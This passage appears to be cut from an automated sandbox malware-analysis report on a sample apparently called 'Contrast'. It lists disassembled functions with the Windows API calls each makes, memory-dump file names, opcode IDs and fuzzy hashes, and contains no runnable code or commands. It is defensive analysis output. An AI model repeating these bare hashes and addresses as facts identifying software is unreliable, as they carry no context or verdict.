                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1505330794-0
                                                                                                                                        • Opcode ID: 57ad9762fb6f81bd051c0d97807ac8df7c7cb1ba31cf69c5a27427c03fae8a91
                                                                                                                                        • Instruction ID: 14a95dcc256e79475ef65ede5945a4583e1ef0a0534d9fd901381ac4476a560d
                                                                                                                                        • Opcode Fuzzy Hash: 57ad9762fb6f81bd051c0d97807ac8df7c7cb1ba31cf69c5a27427c03fae8a91
                                                                                                                                        • Instruction Fuzzy Hash: 8B318EB45097158FC720DF24E889697BBE8FF5A305F000A2FF59A83280F771A948DB52
                                                                                                                                        APIs
                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00535953
                                                                                                                                          • Part of subcall function 0053A39B: __NMSG_WRITE.LIBCMT ref: 0053A3C2
                                                                                                                                          • Part of subcall function 0053A39B: __NMSG_WRITE.LIBCMT ref: 0053A3CC
                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0053595A
                                                                                                                                          • Part of subcall function 0053A3F8: GetModuleFileNameW.KERNEL32(00000000,005D53BA,00000104,00000004,00000001,00531003), ref: 0053A48A
                                                                                                                                          • Part of subcall function 0053A3F8: ___crtMessageBoxW.LIBCMT ref: 0053A538
                                                                                                                                          • Part of subcall function 005332CF: ___crtCorExitProcess.LIBCMT ref: 005332D5
                                                                                                                                          • Part of subcall function 005332CF: ExitProcess.KERNEL32 ref: 005332DE
                                                                                                                                          • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
                                                                                                                                        • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,?,00000004,?,?,00531003,?), ref: 0053597F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                        • Opcode ID: 1236f6c976386463a516b51933daf6ba8688f971a9495a7aabac60d1c7026b7c
                                                                                                                                        • Instruction ID: 7da3a9887be108af7122e72c512309c5b5bc19cf5c40a6eb11062d990952a52d
                                                                                                                                        • Opcode Fuzzy Hash: 1236f6c976386463a516b51933daf6ba8688f971a9495a7aabac60d1c7026b7c
                                                                                                                                        • Instruction Fuzzy Hash: A501D236241B06DAE61527349C06B2E3B48BF92770F101927F8159A2D1FE708D40C661
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 005792D6
                                                                                                                                          • Part of subcall function 00532F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532F99
                                                                                                                                          • Part of subcall function 00532F85: GetLastError.KERNEL32(00000000,?,00539C54,00000000,00538D5D,005359C3), ref: 00532FAB
                                                                                                                                        • _free.LIBCMT ref: 005792E7
                                                                                                                                        • _free.LIBCMT ref: 005792F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                        • Instruction ID: 0db091ea057497b2aeaeecdd1ca2c36e27144a9ac82ccc0e69064c08a049d953
                                                                                                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                                                                        • Instruction Fuzzy Hash: 45E012B1605A1357CA24B578794AEA37FEC6FC8751F15051DB40DD7543CE24E8819178
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CALL
                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                        • Opcode ID: 8d3cc5e7473c5b849749d37cc38ffe25d0fbef2c7034a6e878b8fd5c48324125
                                                                                                                                        • Instruction ID: 33328404196443abb9e924445624faacbe367da674baa474ae3a40155d5adefe
                                                                                                                                        • Opcode Fuzzy Hash: 8d3cc5e7473c5b849749d37cc38ffe25d0fbef2c7034a6e878b8fd5c48324125
                                                                                                                                        • Instruction Fuzzy Hash: 3F325C74508301DFEB24DF14C499AAABFE1BF85304F15895DE88A9B362D731EC85CB82
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0057614E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                        • Opcode ID: 66e5d42048eda6d0001c91a4d99bcdb97655c0fa1715f4cca900ced0a4914cbf
                                                                                                                                        • Instruction ID: 200b00a9206e45f68f03fa0eb49680612c1dcc4ec08d0cdafd68f4838f9e6c3c
                                                                                                                                        • Opcode Fuzzy Hash: 66e5d42048eda6d0001c91a4d99bcdb97655c0fa1715f4cca900ced0a4914cbf
                                                                                                                                        • Instruction Fuzzy Hash: 3541E9B650060A9FDB11DF64D8859AF7BB8FF94350B14853EE51AD7281EB30DE40DB50
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
                                                                                                                                        • Instruction ID: add964f2b35c1e242eaba898f84bad7f6206ce660fc40033d5d7e1246379b5e9
                                                                                                                                        • Opcode Fuzzy Hash: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
                                                                                                                                        • Instruction Fuzzy Hash: AD41D77250820E9FDB10EFB8B88597EBFACFF4D340F248899E54997281DA719D00EB50
                                                                                                                                        APIs
                                                                                                                                        • IsThemeActive.UXTHEME ref: 00525FEF
                                                                                                                                          • Part of subcall function 0053359C: __lock.LIBCMT ref: 005335A2
                                                                                                                                          • Part of subcall function 0053359C: DecodePointer.KERNEL32(00000001,?,00526004,00568892), ref: 005335AE
                                                                                                                                          • Part of subcall function 0053359C: EncodePointer.KERNEL32(?,?,00526004,00568892), ref: 005335B9
                                                                                                                                          • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00525F18
                                                                                                                                          • Part of subcall function 00525F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00525F2D
                                                                                                                                          • Part of subcall function 00525240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0052526C
                                                                                                                                          • Part of subcall function 00525240: IsDebuggerPresent.KERNEL32 ref: 0052527E
                                                                                                                                          • Part of subcall function 00525240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 005252E6
                                                                                                                                          • Part of subcall function 00525240: SetCurrentDirectoryW.KERNEL32(?), ref: 00525366
                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0052602F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1438897964-0
                                                                                                                                        • Opcode ID: d0aa45b8df055166f0cb7d4048fd8244d6b043d8ceeb8d08ed77f7b2c12c8bcf
                                                                                                                                        • Instruction ID: 3f98c5bd9bc192005a33aa642f779781eaacdc0752d22a884bcfeb8fbdea0dd9
                                                                                                                                        • Opcode Fuzzy Hash: d0aa45b8df055166f0cb7d4048fd8244d6b043d8ceeb8d08ed77f7b2c12c8bcf
                                                                                                                                        • Instruction Fuzzy Hash: A0118C718093569BCB20DF69ED0995ABFE8FFA9310F00491FF044872A1EB709588DF92
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __lock_file_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 26237723-0
                                                                                                                                        • Opcode ID: 8db7e2e741dff91396ee1025893e9ee2946e959ec8686c19acbf2f089a809874
                                                                                                                                        • Instruction ID: 0b3b388e3172dbb2bfc0fa06dd40f7d2120500494427e2003534c11d9732a161
                                                                                                                                        • Opcode Fuzzy Hash: 8db7e2e741dff91396ee1025893e9ee2946e959ec8686c19acbf2f089a809874
                                                                                                                                        • Instruction Fuzzy Hash: 5301217180074AEBCF11AFA68C0999EBF61BFC0360F248515B9245A1A1EB758A15DB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
                                                                                                                                        • __lock_file.LIBCMT ref: 0053560B
                                                                                                                                          • Part of subcall function 00536E3E: __lock.LIBCMT ref: 00536E61
                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00535616
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                        • Opcode ID: f496de62ce70e197dd1ae583c6db90b3b58d4ded47ed4fd06c3b63fd49be4c32
                                                                                                                                        • Instruction ID: abd7ace6be2f62ad62d108b2b828ed22932f43c24a2eed493d0120d7d2e1c5f8
                                                                                                                                        • Opcode Fuzzy Hash: f496de62ce70e197dd1ae583c6db90b3b58d4ded47ed4fd06c3b63fd49be4c32
                                                                                                                                        • Instruction Fuzzy Hash: 54F0B471802B07DAD7156BB5880AB6EBFA17F80330F219609F428AB1C1DF7C59019F91
                                                                                                                                        APIs
                                                                                                                                        • __lock_file.LIBCMT ref: 00535EB4
                                                                                                                                        • __ftell_nolock.LIBCMT ref: 00535EBF
                                                                                                                                          • Part of subcall function 00538D58: __getptd_noexit.LIBCMT ref: 00538D58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2999321469-0
                                                                                                                                        • Opcode ID: 4d85a873f1c731a386c6446c196f2611ceb9f2f3827b1189c4a73f34b2317a86
                                                                                                                                        • Instruction ID: fce2b42fd168b4c78e524e7ecc30ec33ce6f3006b3de62ddaccf5284dfbe71e8
                                                                                                                                        • Opcode Fuzzy Hash: 4d85a873f1c731a386c6446c196f2611ceb9f2f3827b1189c4a73f34b2317a86
                                                                                                                                        • Instruction Fuzzy Hash: F3F0EC319117179AD700BBB4880B76E7F947F81331F214645F024EB1D1DFB84E01AB51
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00525AEF
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00525B1F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell__memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 928536360-0
                                                                                                                                        • Opcode ID: 247080d8818060111193823c2dd50f2f1dc5e2400dfa86b4cddef664140217ed
                                                                                                                                        • Instruction ID: 91ba1514e4f01a13869923fb1f38e7d7581bcdbf22de9ed9a71c4471a1020b05
                                                                                                                                        • Opcode Fuzzy Hash: 247080d8818060111193823c2dd50f2f1dc5e2400dfa86b4cddef664140217ed
                                                                                                                                        • Instruction Fuzzy Hash: 57F0A77481935C9FD7A2DB24DC497957BBCA705308F0001EBAA4896292E7750B8CDF51
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandleSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 252777609-0
                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction ID: 65845b3986b00c25567d1d909e6418e794083a4ac2868621f55ad49217b20fbd
                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                        • Instruction Fuzzy Hash: B431E470B00209DFC718DF58C4A0969FBAAFF49340F649AA5E409CB291E731EDC1DB80
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString$__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 207118244-0
                                                                                                                                        • Opcode ID: 4a22128ca4898d6bfc2535d15d3a522bd595ec1c8a4f422df8ad97f2eaf10b18
                                                                                                                                        • Instruction ID: da7161fa406c141d72ee1e41e2926ae42b50b83be450598d150261478dddde3c
                                                                                                                                        • Opcode Fuzzy Hash: 4a22128ca4898d6bfc2535d15d3a522bd595ec1c8a4f422df8ad97f2eaf10b18
                                                                                                                                        • Instruction Fuzzy Hash: CEB12A34A0010A9FCF14EF98D855DEEBFB5FF99710F10811AF915AB291EB70A946CB60
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1ce822638f3de6521e213828cc79da60551f405e810951fb62321f86dcc56a28
                                                                                                                                        • Instruction ID: 8b3d3885e47901f8b05a3808a41cec10961c5060d5a62bf227bc247284502b1b
                                                                                                                                        • Opcode Fuzzy Hash: 1ce822638f3de6521e213828cc79da60551f405e810951fb62321f86dcc56a28
                                                                                                                                        • Instruction Fuzzy Hash: C761CD706002069FEB11DF60C885ABABBF5FF85300F11842EE81A9B282D774EDC5CB52
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                        • Instruction ID: 8bd6ff6cd87978f722f1469bc120486957055460f43c0d41b25854891556055e
                                                                                                                                        • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                        • Instruction Fuzzy Hash: 2C31B675604A13DFCB24EF18E498921FBA0FF4A310B14C56AE9498B7D1E734DD81CB94
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        • Opcode ID: 322c6368b3e5b010e464b2f81a1959c54b938f31396062e3f8c0116941e6d867
                                                                                                                                        • Instruction ID: c611a3e11e16a9bc3c424ddae1e69cd32a010a0b2780616f60f0157005e80d25
                                                                                                                                        • Opcode Fuzzy Hash: 322c6368b3e5b010e464b2f81a1959c54b938f31396062e3f8c0116941e6d867
                                                                                                                                        • Instruction Fuzzy Hash: 6A316C75504515DFCF05AF00D485AA9BFF5FF99320F10888AED596F381CB70A945CBA1
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
